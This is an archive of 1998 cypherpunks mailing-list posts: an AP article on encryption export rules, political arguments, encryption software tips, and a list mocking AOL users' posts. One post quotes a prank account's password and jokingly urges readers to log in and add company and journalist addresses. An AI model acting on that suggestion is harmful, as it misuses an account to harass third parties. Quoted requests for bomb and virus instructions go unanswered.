**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 23:13:35 +0800
To: cypherpunks@cyberpass.net
Subject: IP: White House decision affects e-mail scrambling software
Message-ID: <199809170415.VAA28324@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: White House decision affects e-mail scrambling software
Date: Wed, 16 Sep 1998 18:17:36 -0500
To: believer@telepath.com

Source:  Fox News - AP

White House decision affects e-mail scrambling  software
 6.56 p.m. ET (2256 GMT) September 16, 1998

 By Ted Bridis, Associated Press

 WASHINGTON (AP) - The Clinton administration relaxed some restrictions
Wednesday on the export of powerful data-scrambling technology - a decision
that could help Americans who want to guarantee the privacy of their e-mail
and other electronic information. 

 The White House said U.S. companies can begin selling high-tech tools
overseas that use the so-called 56-bit Data Encryption Standard or its
equivalent, which has an unlocking key with 72 quadrillion possible
combinations. 

 The government imposes limits on exports of the most powerful scrambling
technology - now anything above 56-bit - because it fears that authorities,
even with a judge's permission, won't be able to read the messages of
criminals or terrorists. 

 The export limits do not directly affect Americans, who are legally free
to use encryption technology of any strength. But U.S. companies are
reluctant to develop one version of their technology for domestic use and a
weaker overseas version, so they typically sell only the most powerful type
that's legal for export, even to Americans. 

 Vice President Al Gore called the new rule's balance between privacy and
not helping criminals "probably one of the single-most difficult and
complex issues that you can possibly imagine.'' 

 "We must ensure that new technology does not mean new and sophisticated
criminal and terrorist activity,'' Gore said. "And we must ensure that the
sensitive financial and business transactions that now cruise along the
information superhighway are 100 percent safe in cyberspace.'' 

 Privacy advocates, though, derided Wednesday's announcement as a modest
step, noting that a non-profit group of researchers demonstrated earlier
this summer it can unscramble a 56-bit coded message in just days. 

 Experts have suggested that scrambling sensitive e-mail or online
credit-card transactions using less than 90 bits is vulnerable, while most
experts consider 128-bit encryption practically unbreakable. 

 Some companies that sell encryption products nonetheless praised the
announcement. The president of the Business Software Alliance, Robert
Holleyman, called it "a significant improvement over what we have today.'' 

 The administration previously limited the export of 40-bit encryption
technology, which has more than 1 trillion combinations. 

 "It's a step but it's a small step,'' said Alan Davidson, an encryption
expert for the Washington-based Center for Democracy and Technology. "We're
worried that 56 bits is not enough.'' 

 Barry Steinhardt, president of the Electronic Frontier Foundation, a San
Francisco-based civil liberties group, said: "We assume this is done to
throw a bone to industry at a time when the administration needs all the
friends it can get.''

 "But it's half a step, and it continues to rely on dangerous
technologies,'' he said. 

 The White House also said Wednesday that it will allow U.S. companies to
use unlimited-strength encryption to communicate with their subsidiaries in
all countries except seven terrorist nations: Iran, Iraq, Libya, Syria,
Sudan, North Korea and Cuba. 

 It also agreed to allow U.S. encryption companies to sell the most
powerful scrambling tools overseas to insurance companies and health and
medical organizations in more than 40 countries. 

 And the administration said it will establish a technical support center
for federal, state and local authorities who might be confronted with
criminals using encryption. 

 In June, the Electronic Frontier Foundation used a custom-built computer
worth less than $250,000 to crack a 56-bit encrypted message in less than
three days to win an industry contest. The EFF published a book describing
exactly how to build a replica of its code-breaking computer. 

                  (c) 1998 Associated Press. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 20:51:00 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Democracy... (fwd)
Message-ID: <199809170216.VAA11232@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Democracy... (fwd)
> Date: Wed, 16 Sep 1998 18:46:04 -0700

> > So if a Texas DPS officer pulled over a car from Louisiana he couldn't
> > hassle them in regards to the pot they had in the car. Even 
> > though it was illegal for Texas citizens.
> 
> Wow, you learn something new every day.

You didn't learn anything because you weren't paying attention. This was
supposition based on a strict interpretation of the Constitution. You should
try reading *every* word.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Wed, 16 Sep 1998 20:36:27 +0800
To: cypherpunks@toad.com
Subject: Re: Your new password
Message-ID: <v04011705b226162bb5d4@[199.125.98.24]>
MIME-Version: 1.0
Content-Type: text/plain



I predict that naughty cypherpunks will use these passwords to repeatedly
add the following names to "Schlomo"'s list of contacts:

mark@sixdegrees.com
webmaster@sixdegrees.com
postmaster@sixdegrees.com
issues@sixdegrees.com

If that doesn't work, really naughty cypherpunks may also add the addresses
of prominent journalists.

Of course, those things would be WRONG.

-Lazlo


>Name: Schlomo CyberPoopy
>sixdegrees password: linkcusp
>
>Congratulations Schlomo. You're well on your way to
>becoming a full sixdegrees(tm) member. Here is your member
>password: linkcusp. Use it to log-in on the home page
>at the sixdegrees Web site, http://www.sixdegrees.com.
>We'll ask you for a little more information to complete your
>registration, and then you'll be ready to start networking.
>
>It's important that you return to the site and log-in. Your
>membership will not be complete until you do so.
>
>Once you've successfully logged in with your password, just go
>to Personal Profile and you'll be able to choose your own
>password.
>
>Thanks for becoming part of sixdegrees. We're looking forward
>to seeing you at the site.
>
>====================================================================
>PLEASE NOTE: All replies to this address are processed by a computer.
>If you believe you received this e-mail in error, and it was not your
>intention to become a sixdegrees member, or if you have any problems,
>questions or requests send an e-mail to issues@sixdegrees.com
>and someone will get back to you as soon as possible.
>====================================================================
>
>
>E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Wed, 16 Sep 1998 20:52:50 +0800
To: sunder@brainlink.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <5e38fbca.36006a19@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Hmm... have you ever thought... that my mother may not exactly love the idea
of me having access to other people's accounts... so I need to do what she
DOES condone?  You just don't seem to be using your brain.

>Some of them have over 100 accounts on the same ISP, and are
>truly so full of shit, that they're swimming in it.  Kid, by bullshiting, all
>you're doing is enforcing the view that AOL users are really AOLusers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CHerr58414@aol.com
Date: Wed, 16 Sep 1998 20:47:56 +0800
To: cypherpunks@cyberpass.net
Subject: software
Message-ID: <63f88dc4.36006a60@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



if u got any freeware for encripting and decodeing that would be great so if
you can mail me back some info. Thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 17 Sep 1998 00:04:50 +0800
To: "Lynne L. Harrison" <cypherpunks@Algebra.COM
Subject: Re: LAST WORD: Re: Clinton--Why I am Chortling
In-Reply-To: <3.0.5.32.19980915212954.008c0100@idiom.com>
Message-ID: <4.0.2.19980916214403.00b11d50@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 05:57 AM 9/16/98 -0400, Lynne L. Harrison wrote:
> A woman who comes on to her male employer and, when he
> accepts her "invitation", cannot turn around and allege:
> "Poor me.  I was a victim.  He is so powerful."  

Yet no one seems to have any problem with this rule being
applied to CEOs, only a problem with it being applied to
presidents. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     2aVP9ftnkz+0wn/kd/N9HGp1JPE41U0bVQsUpt+h
     467+NY0mNvo4pZtKEh4Iv9geyZ8ZmQ3GI4jFYWSxJ
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Penrod <jpenrod@sihope.com>
Date: Wed, 16 Sep 1998 22:15:49 +0800
To: "Edwin E. Smith" <theforum@lists.execpc.com
Subject: Re: Voices
In-Reply-To: <3.0.2.32.19980915190932.007fb350@mailhost.IntNet.net>
Message-ID: <199809170307.WAA08854@unix1.sihope.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:09 PM 9/15/98 -0400, Edwin E. Smith wrote:

>I confess that sometimes I troll 
>for flames to get the dialog going. 

>To all of you who are offended by what you read or have been attacked 
>and shirk away I say, stick around, learn and grow. The words which 
>come to you can not hurt you if you don't let them. If you are to 
>timid to endure a few flames then woe be unto you if anyone comes at 
>you with actual violence on his mind.


You aren't cscoville@tns-inc.com, are you?


Regards,

Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 15:16:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton still doesnt get it
Message-ID: <199809162017.WAA32443@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:
> 
> Frondeur writes:
> 
> > Why do you believe the perjury case has `reasonable doubt' problems?
> 
> Watch TV and learn the answer.  It's only perjury if it's material,
> and the judge said it wasn't material.

This doesn't speak to `reasonable doubt' which was the subject
under discussion.  Or are you arguing that a defense to perjury
is that there is reasonable doubt that a question was material?
Go watch TV and report back with the answer.


> > And the abuse of power case seems thin even to a non-lawyer.  But
> > where does the `executive privilege stuff' come in?  I don't see
> > that Starr listed that among his possible grounds for impeachment.
> 
> Among the grounds Starr listed was Clinton's attempt to delay the
> investigation by raising many legal objections. He claimed privilege,
> for example, with respect to Secret Service testimony.  Most of his
> efforts were ultimately overruled.

Yes, but I assumed Mac had included this under the `abuse of power'
heading since he explicitly cited that topic in his message to which
I was responding, and since that appeared to match one of the broad
headings under which Starr classifies his possible `grounds for
impeachment':

    "...that President Clinton's actions ... have been inconsistent 
    with the President's constitutional duty to faithfully execute 
    the laws. "

I see nowhere that Starr claims that it was illegal/impeachable for
Clinton to have claimed executive privilege.  He merely notes that
Clinton used it (extensively) along with a bunch of other tactics to
delay and impede the investigation.

 - Frondeur




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeger <Jaeger@hempseed.com>
Date: Wed, 16 Sep 1998 22:26:33 +0800
To: "Edwin E. Smith" <cypherpunks@toad.com
Subject: Re: Democracy...
In-Reply-To: <35FF220A.F88B87F6@hempseed.com>
Message-ID: <36008052.C8B84516@hempseed.com>
MIME-Version: 1.0
Content-Type: text/plain



I reply to this message going point by point, within the original
text...  so scroll down if you care to read what I wrote..

> AI recently saw a posting about right v. wrong or good v. evil. These
> are subjective terms as any good semanticist knows. But what is real

Neither good nor evil is subjective to anything...  if something is
absolutely evil, then there is nothing that will make it good...  (and
vice versa <SP?>)

> and what is unreal is a much more difficult thing to determine. It
> requires rigorous thinking without prejudice or belief getting in the
> way.

> As to law. The first of the Bill of Rights says:
>
> Congress shall make no law respecting an establishment of religion,
> or prohibiting the free exercise thereof; or abridging the freedom of
> speech, or of the press; or the right of the people peaceably to
> assemble, and to petition the Government for a redress of grievances.
>
> If you are going to quote something, do it fully and accurately. It
> isn't that hard and if you don't have a copy of the constitution
> laying around then either get one or keep your damn mouth shut until
> you know what you are talking about.
>

as to the above thing about quoting, I agree...

> No, the words "seperation of church and state" do not appear but then
> neither does "privacy", but it is damn well implied by the 4th
> amendment.
>

I disagree with the above...  I'll explain later

> Those self-righteous pricks who want bible reading in the schools and
>

speaking of invalid arguments...  might the above be an <gasp!> ad
hominem (abusive) attack ?!?

> rail against those who recite the 1st amendment either lack
> understanding of the term "reading" or are being dishonest by
>

ditto to my previous comment

> insisting that disallowing teachers to read the bible to students is
> wrong and that the constitution needs to be amended. Anyone with any
> honesty would realize that the first amendment doesn't prohibit bible
> reading by students or even bible study in a historical context. It
>

as for the teachers reading the Bible to their classes, I would agree
that that is a violation of the first amendment...  however, the Bible
is a useful teaching tool as far as understanding history, as much of
history is influenced by the Bible or parts of it (the crusades, the
inquisition, various countries' foundings/gov't systems, and, of course,
the United States' history).  Using the Bible in a historical context
passes the Lemon test (guidelines laid out by the USSC regarding gov't
attitude towards religion)

> merely prohibits tax-paid teachers from "respecting an establishment
> of religion, or prohibiting the free exercise thereof;". If I see
> just one more bible-thumping zealot message about "would you care to
> show us where "seperation of church and state" is to be found in the
> constitution/bill of rights?" I will be tempted to take him out in
> the parking lot and pound sand into the parts which are unaccustomed
> to this substance.
>

okay, so this is a new kind of fallacy...  the appeal to a physical
threat as a means of winning an argument...  great...  you seem to be
very well rounded in making a variety of false arguments...

> I am all for separation of school and state. Show me where in the
> constitution/bill of rights everyone is entitled to a theft/tax
> funded education. This would solve church and state in schools
>

I defintiely agree with the above...

> wouldn't it. If you don't like your kids getting a non-religious
> education from the godless state, you are free to pull them out and
> put them into a private school of your choice. But of course it isn't
>

I was homeschooled for four years...(against my will)

> your kids you are worried about is it? It's all those other peoples
> kids that aren't getting the benefit of the word of the one true
> Christian god that you want to help isn't it!
>

no, actually it's more the insistence of the schools to present only the
humanist approach (which I consider a religion), rather than presenting
the facts as they are that bothers me...

> Hypocrisy is the Vaseline(tm) of political intercourse!
>
> Edwin E. Smith
>

how lovely....

Jaeger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Neels Kriek" <kriek@bigfoot.com>
Date: Wed, 16 Sep 1998 22:57:47 +0800
To: "Sunder" <sunder@brainlink.com>
Subject: Re: Encrypting files.
Message-ID: <001201bde1ee$b19c04a0$93060cd1@alien>
MIME-Version: 1.0
Content-Type: text/plain



Try DataSafe.  Dunno which algo it uses but easy to use and anything is
better than zip ;)

www.novastor.com

hope this helps
-----Original Message-----
From: Sunder <sunder@brainlink.com>
To: Lars Weitze <chromedemon@netcologne.de>
Cc: Cypherpunks <cypherpunks@toad.com>
Date: Wednesday, September 16, 1998 18:25
Subject: Re: Encrypting files.


>Lars Weitze wrote:
>>
>> Does anyone now a program for WindozeNT to store encrypted data on
harddisk.
>> At the moment i use
>> ZIP-Files with a Password on them (I now it is not very secure).
>> I am living outside USA and do not want any software with backdoors
>> ,"masterkeys" or stuff like that.
>
>http://www.pcdynamics.com/SafeHouse/
>
>--
>
>=====================================Kaos=Keraunos=Kybernetos==============
>.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
>..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
><--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
>../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
>.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
>======================= http://www.sundernet.com ==========================
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 17 Sep 1998 01:04:37 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: DARPA Hires NetAss/TIS TO Develop Secure DNS
In-Reply-To: <v04011712b20c5989c94f@[139.167.130.248]>
Message-ID: <v04101709b226560e519a@[192.168.16.6]>
MIME-Version: 1.0
Content-Type: text/plain



>This is somewhat tacky.  SecureDNS exists, and TIS got export approval
>a while back to publish a "bones" version, minus encryption routines.
>John Gilmore and his lawyer decided that, since it only does authentication,
>not message encryption, it should be ok to publish _with_ the crypto
>algorithms, and it's been quietly sitting on his web pages.
>Recently the Feds sent him a letter saying "Oh, no, we didn't mean
>it was OK to publish/export this encryption-based authentication system
>just because the law says you can, so stop it"....
>Now they're paying for another version.  Are they going to try something
>DSS-based instead of RSA, just so you don't need encryption-capable
>crypto with it, or is this going to be another scam?
>Or is it just different parts of the Feds not talking to each other?
>
Delay is the deadliest form of denial.
-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

"I predict future happiness for Americans if they can prevent the
government from wasting the labors of the people under the pretense of
taking care of them." --Thomas Jefferson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Wed, 16 Sep 1998 22:10:32 +0800
To: cypherpunks@Algebra.COM
Subject: Re: The AOL Chronicles
In-Reply-To: <199809170045.CAA23060@replay.com>
Message-ID: <3600A7C2.4322F295@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



I hate to break it to you but, while most are pretty damn clueless,
there were some in that list that show that either you should go find a
clue (because the thought expressed went right over your head) or you
are placing all things which you disagree with in the clueless category.

PHM

Anonymous wrote:
> 
> Every time one of these AOL wars start, the AOLers claim that there are a
> few intelligent people on AOL and that our shunning of them based on
> statistics is unjustified. We all know what the statistics are, but I
> don't think anybody has done this for Cypherpunks yet. It has been done
> other places. This isn't scientific with margins of error and everything,
> but it's good enough to illustrate the point.
> 
> I went through every posting originating from AOL which was sent to
> Cypherpunks between July and September 16th, which is today. I classified
> postings as either "clueful" or "clueless," with the latter determined by
> relevance to the list, literacy, quoting, and whether it makes any sense
> at all. Anything completely stupid is also classed as "clueless."
> "Clueful" is anything which is even remotely relevant to the list, and
> includes quoted material if a followup.
> 
> In addition, if an AOL user sends something clueless to the list then gets
> flamed, that posting and any subsequent postings in that thread by the
> original author are counted as clueless unless it's an apology, at which
> point it isn't counted at all. The flames of said user are counted as
> defense, not as clueless. Also, if I looked at the message but couldn't
> tell what the hell the author was talking about because he didn't bother
> to quote, I classed the posting as clueless.
> 
> A "*" denotes that the portion I quote is the entire message. A "+"
> denotes that there was either no quoted material in the message or that it
> used the "<<>>" style. Keep in mind that messages which are original would
> not have quoted material, but still have a "+". A "H" means that it
> contained HTML. I removed all new lines from the quotes to make them more
> compact. If the posting was large, I quoted only some parts.
> 
> Clueless posts from AOL:
> 
> 1) "At least they have TCP/IP protocols now with Win 95 ex: Hiroshima
>    45, Tsjernobyl 86, Windows 95 (Please, correct my spelling if I
>    misspelled Tsjernobyl)" -- FTPPork@aol.com (Porker), 18 Aug 1998, (+)
> 
> 2) "Ibelive by spooks he ment goverment agents not a racial slur so lay
>    off." -- ILovToHack@aol.com, 31 Aug 1998, (+*)
> 
> 3) "judy -- how about let's go shopping first and then watch the show
>    remotely together????" -- Syniker@aol.com, 16 Jul 1998, (+)
> 
> 4) "please i need some suggestions with topics for my informative speech,
>    or may some infromative speeches already outlined to use it for
>    refrence. thankyou." -- KMHAsfaha@aol.com, 17 Jul 1998, (*+)
> 
> 5) "d" -- Saxgrim@aol.com, 18 Jul 1998, (*+)
> 
> 6) "send me the book (e/mail me back" -- JackeI466@aol.com, 19 Jul 1998,
>    (+*)
> 
> 7) "Hello: My name is Enisa, I'm 13 years old. I write an online e-zine
>    that for teens. We have over 150+ members. We just started a few days
>    ago. We are looking for sponsors to sponsor our contests. These are
>    some of the things we are able to do for you..." -- Craz8Grl@aol.com,
>    20 Jul 1998, (+H)
> 
> 8) "you got it?" -- LrdWill@aol.com, 20 Jul 1998, (+*)
> 
> 9) "would love to see info re; international credit cards." --
>    TTrump5646@aol.com, 21 Jul 1998, (+*)
> 
> 10) "i would be very delighted if u gave me a free download for 5.0
>     realplayer.if u would send it to mike111495@aol.com and
>     indoe29c@aol.com we will be very honored to receive them. thankx and
>     goodbye" -- Mike111495@aol.com, 22 Jul 1998, (+*)
> 
> 11) [A bunch of asterisks and screaming] "I was recently informed from
>     sorces who choose to remain annomous about a viri that uses macafe's
>     update tool to detect when it is found then it modifys its code and
>     forms a new strain of the virus this pattern continues although it has
>     only been tested through a clone of macafees server to 100 mutations
>     it looks like it could be a big problem I will inform you of any more
>     information i learn about it but for now    "THE TRUTH IS OUT THERE""
>     -- ILovToHack@aol.com, 22 Jul 1998, (+*)
> 
> 12) "WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?" --
>     koitch@aol.com, 23 Jul 1998, (+*)
> 
> 13) [Subject: Pipe bombs r better] "they rule!" -- Ant6menace@aol.com, 23
>     Jul 1998, (+*)
> 
> 14) "Actually, AOL, along with being an acceptable ISP with built in
>     authentication of sender, has an easily used Mail interface.  (Even if
>     it doesn't exactly follow the standards.)" -- MMerlynne@aol.com, 24
>     Jul 1998, (+*), in response to #12.
> 
> 15) "HELLO, IS THERE ANY WAY TO GET MY HANDS ON S BOOK THAT SHOWS THE REAL
>     BASEBALL PEOPLE AUTOGRAPHS AND THE FAKES SO I KNOW WHAT TO LOOK FOR???
>     PLEASE REPLY" -- AT666IND@aol.com, 25 Jul 1998, (+*)
> 
> 16) "I am trying to find my brother, "Allen Thomas Taylor" I am not sure
>     what year he was born but I think it was l922, l923.  We have the same
>     Father[...]" -- CEr1942929@aol.com (Christine Ernest), 26 Jul 1998,
>    (+)
> 
> 17) "Hey:  Who made up the term "Politically Correct"?  Not Christians and
>     not Republicans. Your side did.  How does wanting a smaller
>    government, less taxes, the freedom to CHOOSE to pray in schools, the
>    rights of the un-born( of[...] CHOKE ON IT YOU HYPOCRITE" --
>    JBrown4330@aol.com, 27 Jul 1998, (+)
> 
> 18) "do you have music vinyl stickers , if so , could i get them
>     wholesale?" -- Babybee390@aol.com, 29 Jul 1998, (+*)
> 
> 19) "I'm looking for Lynrd Skynrds Freebird  on a window sticker for my
>     car.  Do you know where I can find one?" -- Vox9869@aol.com, 28 Jul
>    1998, (+*)
> 
> 20) "More!" -- CLCTCHR@aol.com, 29 Jul 1998, (+*)
> 
> 21) "Can you do a 5 color process?  4x4".  Price on 500,1000,1500" --
>     ELarson100@aol.com, 4 Aug 1998, (+*)
> 
> 22) [Subject: whut up] "looking for a place to have some Band stickers
>     made, can you email me a phone number so we can check out some
>     prices.....thanks TIm" -- FRETELUCO@aol.com, 6 Aug 1998, (+*)
> 
> 23) "Could you please send me the Anarchy Cookbook.....I really want it
>     and I cant find it anywhere! Thanx for your help.. Mike Jonhson" --
>     XoVoX123@aol.com, 9 Aug 1998, (+*)
> 
> 24) [Subject: .] "" (Yes, nothing.) -- EpicTeU@aol.com, 9 Aug 1998, (+*)
> 
> 25) "Come on thake it easy on the guy at least he aint on AOL or somthing
>     stuped." -- ILovToHack@aol.com, 13 Aug 1998, ()
> 
> 26) [Subject: Subject: LOL. Made me look] "" (Yes, nothing.) --
>     Seabiner@aol.com, 14 Aug 1998, (+*)
> 
> 27) "about: Hello, I am trying to start a VB 32 bit code bank you can send
>     any code you want to exept codes for aol addons...  . 1nce a week most
>     likely on fridays I will check the hotmail account specifyed below and
>     I will take all the codes and put them in a txt file and send it to
>     everyone who sent a code in since I am [...] To send Codes for the ML
>     Send E-mail to VB32Coders@Hotmail.com In the sbject field write
>     anonymous / Code topic if you don't want your E-Mail address to show
>     up when I send the Codes out or else just type the topic of the code
>     you are sending.. ." -- EpicTeU@aol.com, 14 Aug 1998, (+)
> 
> 28) "Because the American Justice system is screwed up royally... for
>    instance - Kevin Mitnick... www.KevinMitnick.com" -- FTPPork@aol.com,
>    17 Aug 1998, (+*)
> 
> 29) "I am interested in travel between Knoxville, Tennessee  and Des
>     Moines, Iowa. I would also be interested in Nashville, Tennessee and
>     Des Moines, Iowa or Atlanta and Des Moines, Iowa.  Please notify me of
>     specials in these markets. Thanks, Linda Tisue ltisue@aol.com" --
>     Ltisue@aol.com, 18 Aug 1998, (+*)
> 
> 30) "I am looking to distribute a product and I was wondering if you can
>     tell me how to get mass e mail addresses. I look forward to hearing
>     from you." -- LHilley488@aol.com, 19 Aug 1998, (+*)
> 
> 31) "Send me info on how to make a pipe bomb. HoppyF1315" --
>     HOPPYF1215@aol.com (Hoppy Head), 19 Aug 1998, (+*)
> 
> 32) "I take that statement as an insult, and it really isn't true about
>     all of us AOL users. [...] Actually, some of us know what real hacking
>     is...[...] Anyway, try not to stereotype people so much, because, with
>     the Advent of 32 bit AOL, we can actually use all of the TCP/IP
>     protocols, etc..." -- FTPPork@aol.com, 20 Aug 1998, (+)
> 
> 33) [Subject: anarchy cookbook] "Is any one home?" -- Spazherp@aol.com, 21
>     Aug 1998, (+*)
> 
> 34) "I did not say anywhere that 32 bit would fix problems of cluelessness
>     - or ignorance in your case.  I said, it is a little better because we
>    can now use TCP/IP protocols.  Did I ever say that the people on AOL
>    were smarter because of it?  Well, let's go read over that post - - -
>    nope... I didn't.  I think some people should read a little more
>    carefully, or just don't read at all." -- FTPPork@aol.com, 22 Aug 1998,
>    (+*) (As I recall, this one was in response to a set of flames which
>    cited his assertion in #32.)
> 
> 35) [Subject: can you help me make virses please tell me who to make one
>     step by step] "I need help i want to know how to make a virses in
>     c\c++ please help me." -- VXF32@aol.com, 21 Aug 1998, (+*)
> 
> 36) "Tell me how to get tons of free stuff!  Thank You ." --
>     RAGOD5597@aol.com, 21 Aug 1998, (+*)
> 
> 37) "Here we go again" -- FTPPork@aol.com, 22 Aug 1998, (+*)
> 
> 38) [Subject: tell me] "hola and good tidings send some info on spooks
>     please i will be grateful" -- RyanFord@aol.com, 29 Aug 1998, (+*)
> 
> 39) [Subject: h] "how did u do it" -- CRBREW9802@aol.com, 7 Sep 1998, (+*)
> 
> 40) " HaCkaZ OnlY Da EliTeHelLO YaLL DiS is Da MaDD AAOOLL HaCka Ima
>     startin a GreWp fOR HaCs Only So In OthA WerDS yA gOttA KnOw The WAreZ
>     anD HoW toO UsEr FaTe AnD AOL So MaIl Or Im Me FoR Da TeTaIls If YeR
>     LeeTo K Pe@CE FrOmE The LeeTs HacKJeFFrO)" -- Jrjeffro@aol.com, 9 Sep
>     1998, (+*)
> 
> 41) Message quoting the above, which wasn't originally sent to the list,
>     in "<< >>" style, adding only: "What the hell is this? No wonder why
>     AOLers have a bad name Im going to Flame this guy" -- EpicTeU@aol.com,
>     10 Sep 1998, (+*)
> 
> 42) "Preach on brother =)" -- AIMSX@aol.com, 15 Sep 1998, (+*), copied to
>     25 other recipients, plus the list.
> 
> 43) "I read that book" -- AIMSX@aol.com, 15 Sep 1998, (+*)
> 
> 44) "All Creatures Great and Small - that one... =) I also read an Aasimov
>     a while back in fifth grade - unfortunately, I can't remember even the
>     name... I need to pick some of his books up again... One book I can
>     remember reading since 5th grade (and every summer thereafter) is "IT"
>     by Stephen King - one of his few really good books.  I have read it 8
>     times since. I greatly recommend it =)" -- AIMSX@aol.com, 15 Sep 1998,
>     (+*)
> 
> 45) "We are sending you an invitation to be one of our special guests this
>     year, big harry ass lawsuits are always of interest.  Bring a friend
>     if you like, but I have to warn you, Liberatarians are not welcome.
>     This years menu includes red meat and poptarts.  Clothing is optional.
>     Sincerely, Beth" -- BUFFU@aol.com, 17 Jul 1998, (+*)
> 
> 46) "That's why I suggest listening to I Robot by Alan Parson's Project."
>     -- StanSqncrs@aol.com, 18 Jul 1998, (+*)
> 
> 47) "If sombody offers you some FedGov, just say NO!" --
>     Nilsphone@aol.com, 23 Jul 1998, (), copied to 32 recipients, including
>     the list.
> 
> Note the "+" ratings on the below. (Semi-)Clueful postings from AOL:
> 
> 1) "It's the easy way out (and I mean DOWN and OUT)!  I mean, if we're
>    simply going to change them out everytime, why bother to figure out
>    which ones a going to change them out everytime, why bother to figure
>    out which ones aren't evil/stupid (I mean, out of all those
>    politicians, there's got to be 1 or 2! I think. ;-) )? See, if we just
>    simply change politicians at every chance, then we throw the baby out
>    with the bathwater, so to speak.  The simple solutions aren't always
>    the best ones." -- StanSqncrs@aol.com, 17 Jul 1998, (+*)
> 
> 2) "ROFLOL!  What's coincidental?  The latest tune that my band, Nobody's
>    Business (in which I play bass and sing) has learned, is Cheap
>    Sunglasses by ZZ Top. If it ain't coinicidence, I got a 'scarecrow' in
>    my band. " -- StanSqncrs@aol.com, 18 Jul 1998, (+)
> 
> 3) [Subject: Subject: Nomination of Lyndon Larouche to the UNITED NATIONS
>    OF THE FRINGE] "Hey Punks, As a United Nations OF the Cyber Fringe
>    Member,  I am asking for your input on giving Lyndon a nomination.  So
>    far his war crimes only include[...]" -- BUFFU@aol.com, 20 Jul 1998,
>    (+)
> 
> 4) "If you would like information about tempest monitors, computers,
>    printers or secure fax machines, please contact me." --
>    CompSec01@aol.com (Karen Azoff), 22 Jul 1998, (+)
> 
> I gave up at this point because the clueless list just kept growing. The
> ratio isn't encouraging, especially since I was being generous with what
> is considered a "clueful post."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Wed, 16 Sep 1998 22:22:26 +0800
To: <cypherpunks@toad.com>
Subject: Re: Democracy...
Message-ID: <199809170315.XAA26801@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 9/15/98 10:27 PM, Jaeger (Jaeger@hempseed.com)  passed this wisdom:

>
>hey, would you care to show us where "seperation of church and state" is
>to be found in the constitution/bill of rights?  absolute right and
>wrong is not a religious belief (necessarily)..  your religious beliefs
>do not affect the nature of reality.  there are absolute truths by

 [snip]

>> Ever heard of seperation of church and state? Democracy? the rights of
>>
>> the individual?  While you certainly have the right to practice your
>> religion in what ever manner you so choose demanding that everyone
>> else
>> does, or that the president of the us of ais subject to you PERSONAL
>> faith decisions is outragous

 The first amendment states only that there shall not be 'an 
establishment of religion' it says nada about 'separation of church and 
state.'  The intention was simple; that there would never be an 
'official' state religion. It didn't say religion had no place. They were 
escaping a regime with an established state religion that used the 
goverment to stamp out religious deviationism. That was the sole reason 
for that clause in the 1st amendment.

